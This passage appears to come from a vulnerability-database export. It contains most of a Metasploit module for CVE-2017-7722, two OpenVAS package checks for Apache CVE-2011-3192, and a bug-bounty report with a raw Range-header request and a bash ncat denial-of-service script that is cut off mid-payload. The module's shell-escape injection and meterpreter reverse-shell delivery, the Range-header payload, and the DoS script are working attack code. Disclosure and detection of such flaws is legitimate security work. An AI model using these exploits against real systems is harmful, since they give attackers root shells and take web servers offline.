By exploiting a\n vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n This module was tested against SolarWinds LEM v6.3.1.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mehmet Ince <mehmet@mehmetince.net>', # discovery & msf module\n ],\n 'References' =>\n [\n ['CVE', '2017-7722'],\n ['URL', 'http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/']\n ],\n 'DefaultOptions' =>\n {\n 'Payload' => 'python/meterpreter/reverse_tcp',\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [ ['Automatic', {}] ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 17 2017\",\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RPORT(32022),\n OptString.new('USERNAME', [ true, 'The username for authentication', 'cmc' ]),\n OptString.new('PASSWORD', [ true, 'The password for authentication', 'password' ]),\n ]\n )\n\n register_advanced_options(\n [\n OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])\n ]\n )\n end\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def exploit\n factory = ssh_socket_factory\n opts = {\n :auth_methods => ['keyboard-interactive'],\n :port => rport,\n :use_agent => false,\n :config => false,\n :password => password,\n :proxy => factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n\n opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\n\n print_status(\"#{rhost}:#{rport} - Attempting to login...\")\n\n begin\n ssh = nil\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n ssh = Net::SSH.start(rhost, username, opts)\n end\n rescue Rex::ConnectionError\n return\n rescue Net::SSH::Disconnect, 
::EOFError\n print_error \"#{rhost}:#{rport} SSH - Disconnected during negotiation\"\n return\n rescue ::Timeout::Error\n print_error \"#{rhost}:#{rport} SSH - Timed out during negotiation\"\n return\n rescue Net::SSH::AuthenticationFailed\n print_error \"#{rhost}:#{rport} SSH - Failed authentication due wrong credentials.\"\n rescue Net::SSH::Exception => e\n print_error \"#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}\"\n return\n end\n\n if ssh\n payload_executed = false\n print_good(\"SSH connection is established.\")\n\n ssh.open_channel do |channel|\n print_status(\"Requesting pty... We need it in order to interact with menuing system.\")\n\n channel.request_pty do |ch, success|\n raise ::RuntimeError, \"Could not request pty!\" unless success\n print_good(\"Pty successfully obtained.\")\n\n print_status(\"Requesting a shell.\")\n ch.send_channel_request(\"shell\") do |ch, success|\n raise ::RuntimeError, \"Could not open shell!\" unless success\n print_good(\"Remote shell successfully obtained.\")\n end\n end\n\n channel.on_data do |ch, data|\n if data.include? \"cmc \"\n print_good(\"Step 1 is done. Managed to access terminal menu.\")\n channel.send_data(\"service\\n\")\n end\n\n if data.include? \"service \"\n print_good(\"Step 2 is done. Managed to select 'service' sub menu.\")\n channel.send_data(\"restrictssh\\n\")\n end\n\n if data.include? \"Press <enter> to configure restriction on the SSH service to the Manager Appliance\"\n print_good(\"Step 3 is done. Managed to start 'restrictssh' function.\")\n channel.send_data(\"*#`bash>&2`\\n\")\n end\n\n if data.include? \"Are the hosts\"\n print_good(\"Step 4 is done. We are going to try escape from jail shell.\")\n channel.send_data(\"Y\\n\")\n end\n\n if data.include? \"/usr/local/contego\"\n if payload_executed == false\n print_good(\"Sweet..! 
Escaped from jail.\")\n print_status(\"Delivering payload...\")\n channel.send_data(\"python -c \\\"#{payload.encoded}\\\"\\n\")\n payload_executed = true\n end\n end\n\n end\n end\n begin\n ssh.loop unless session_created?\n rescue Errno::EBADF => e\n elog(e.message)\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/ssh/solarwinds_lem_exec.rb"}], "openvas": [{"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2011-1245", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122095", "title": "Oracle Linux Local Check: ELSA-2011-1245", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1245.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122095\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1245\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1245 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1245\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1245.html\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.1.el5_7.1\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:25", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120518", "title": "Amazon Linux Local Check: ALAS-2011-1", "type": "openvas", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n# $Id: alas-2011-1.nasl 11703 2018-10-01 08:05:31Z cfischer $\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120518\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:43 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2011-1\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. (CVE-2011-3192 )All httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "hackerone": [{"lastseen": 
"2018-04-19T17:34:10", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "owncloud.com is vulnerable to Apache range header denial of service. This was confirmed by injecting Range: header payloads and analyzing the request vs. response times to an arbitrary page. The results confirm that processing times took up to 50,000 milliseconds per request when the range header values were specified compared to just 1,000 milliseconds when no range header was specified. This was further confirmed by the Server: header field for owncloud which states the running version of Apache is 2.2.17 which is vulnerable to this attack. \r\n\r\nThis is caused by CVE-2011-3192 which means the server (Apache) is running a vulnerable version of Apache (All versions prior to 2.2.20 are vulnerable). The results could also be further compounded in the case of increased threads per host and by using multiple hosts to attack the website using the same attack. \r\n\r\nSee attached evidence for further proof.\r\n\r\nGET / HTTP/1.1 \r\nHost: owncloud.com \r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \r\nAccept-Language: en-US,en;q=0.5 \r\nAccept-Encoding: gzip, deflate \r\nRange: 
bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5
-350,5-351,5-352,5-353,5-354,5-355,5-356,5-357,5-358,5-359,5-360,5-361,5-362,5-363,5-364,5-365,5-366,5-367,5-368,5-369,5-370,5-371,5-372,5-373,5-374,5-375,5-376,5-377,5-378,5-379,5-380,5-381,5-382,5-383,5-384,5-385,5-386,5-387,5-388,5-389,5-390,5-391,5-392,5-393,5-394,5-395,5-396,5-397,5-398,5-399,5-400,5-401,5-402,5-403,5-404,5-405,5-406,5-407,5-408,5-409,5-410,5-411,5-412,5-413,5-414,5-415,5-416,5-417,5-418,5-419,5-420,5-421,5-422,5-423,5-424,5-425,5-426,5-427,5-428,5-429,5-430,5-431,5-432,5-433,5-434,5-435,5-436,5-437,5-438,5-439,5-440,5-441,5-442,5-443,5-444,5-445,5-446,5-447,5-448,5-449,5-450,5-451,5-452,5-453,5-454,5-455,5-456,5-457,5-458,5-459,5-460,5-461,5-462,5-463,5-464,5-465,5-466,5-467,5-468,5-469,5-470,5-471,5-472,5-473,5-474,5-475,5-476,5-477,5-478,5-479,5-480,5-481,5-482,5-483,5-484,5-485,5-486,5-487,5-488,5-489,5-490,5-491,5-492,5-493,5-494,5-495,5-496,5-497,5-498,5-499,5-500,5-501,5-502,5-503,5-504,5-505,5-506,5-507,5-508,5-509,5-510,5-511,5-512,5-513,5-514,5-515,5-516,5-517,5-518,5-519,5-520,5-521,5-522,5-523,5-524,5-525,5-526,5-527,5-528,5-529,5-530,5-531,5-532,5-533,5-534,5-535,5-536,5-537,5-538,5-539,5-540,5-541,5-542,5-543,5-544,5-545,5-546,5-547,5-548,5-549,5-550,5-551,5-552,5-553,5-554,5-555,5-556,5-557,5-558,5-559,5-560,5-561,5-562,5-563,5-564,5-565,5-566,5-567,5-568,5-569,5-570,5-571,5-572,5-573,5-574,5-575,5-576,5-577,5-578,5-579,5-580,5-581,5-582,5-583,5-584,5-585,5-586,5-587,5-588,5-589,5-590,5-591,5-592,5-593,5-594,5-595,5-596,5-597,5-598,5-599,5-600,5-601,5-602,5-603,5-604,5-605,5-606,5-607,5-608,5-609,5-610,5-611,5-612,5-613,5-614,5-615,5-616,5-617,5-618,5-619,5-620,5-621,5-622,5-623,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-6
83,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1
014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299 
\r\nConnection: close\r\n\r\n\r\nI also developed the following PoC exploit for this vulnerability:\r\n\r\n#!/bin/bash \r\n# Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield \r\n# CVE: CVE-2011-3192\r\n# Software: Apache <= all versions prior to 2.2.20 and prior to 2.0.65\r\n# Researcher: 1N3 @ https://crowdshield.com \r\n# Date: 8/21/2015 \r\n#\r\n\r\nTARGET=\"$1\"\r\nPORT=\"$2\"\r\nCMD='ncat'\r\n\r\nif [ -z $TARGET ]; then \r\n\techo \"+ -- --=[Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield\" \r\n\techo \"+ -- --=[http://crowdshield.com\" \r\n\techo \"+ -- --=[Usage: ./apache_range_dos <target> <port>\" \r\n\techo \"\" \r\n\texit \r\nfi\r\n\r\necho \"+ -- --=[Apache Range Header Denial of Service Exploit by 1N3 @ CrowdShield\" \r\necho \"+ -- --=[http://crowdshield.com\" \r\n\r\nif [ -z $PORT ]; then \r\n\techo \"+ -- --=[Using default port 80/tcp (http)...\"\r\n\tPORT=\"80\" \r\n\tCMD='ncat'\r\nfi\r\n\r\nif [ $PORT -eq \"80\" ]; then \r\n\tPORT=\"80\" \r\n\tCMD='ncat'\r\nfi\r\n\r\nif [ $PORT -eq \"443\" ]; then\r\n\techo \"+ -- --=[Using default SSL port 443/tcp (https)...\"\r\n\tPORT=\"443\"\r\n\tCMD='ncat --ssl'\r\nfi\r\n\r\nBUFFER='Range: 
bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-110,5-111,5-112,5-113,5-114,5-115,5-116,5-117,5-118,5-119,5-120,5-121,5-122,5-123,5-124,5-125,5-126,5-127,5-128,5-129,5-130,5-131,5-132,5-133,5-134,5-135,5-136,5-137,5-138,5-139,5-140,5-141,5-142,5-143,5-144,5-145,5-146,5-147,5-148,5-149,5-150,5-151,5-152,5-153,5-154,5-155,5-156,5-157,5-158,5-159,5-160,5-161,5-162,5-163,5-164,5-165,5-166,5-167,5-168,5-169,5-170,5-171,5-172,5-173,5-174,5-175,5-176,5-177,5-178,5-179,5-180,5-181,5-182,5-183,5-184,5-185,5-186,5-187,5-188,5-189,5-190,5-191,5-192,5-193,5-194,5-195,5-196,5-197,5-198,5-199,5-200,5-201,5-202,5-203,5-204,5-205,5-206,5-207,5-208,5-209,5-210,5-211,5-212,5-213,5-214,5-215,5-216,5-217,5-218,5-219,5-220,5-221,5-222,5-223,5-224,5-225,5-226,5-227,5-228,5-229,5-230,5-231,5-232,5-233,5-234,5-235,5-236,5-237,5-238,5-239,5-240,5-241,5-242,5-243,5-244,5-245,5-246,5-247,5-248,5-249,5-250,5-251,5-252,5-253,5-254,5-255,5-256,5-257,5-258,5-259,5-260,5-261,5-262,5-263,5-264,5-265,5-266,5-267,5-268,5-269,5-270,5-271,5-272,5-273,5-274,5-275,5-276,5-277,5-278,5-279,5-280,5-281,5-282,5-283,5-284,5-285,5-286,5-287,5-288,5-289,5-290,5-291,5-292,5-293,5-294,5-295,5-296,5-297,5-298,5-299,5-300,5-301,5-302,5-303,5-304,5-305,5-306,5-307,5-308,5-309,5-310,5-311,5-312,5-313,5-314,5-315,5-316,5-317,5-318,5-319,5-320,5-321,5-322,5-323,5-324,5-325,5-326,5-327,5-328,5-329,5-330,5-331,5-332,5-333,5-334,5-335,5-336,5-337,5-338,5-339,5-340,5-341,5-342,5-343,5-344,5-345,5-346,5-347,5-348,5-349,5
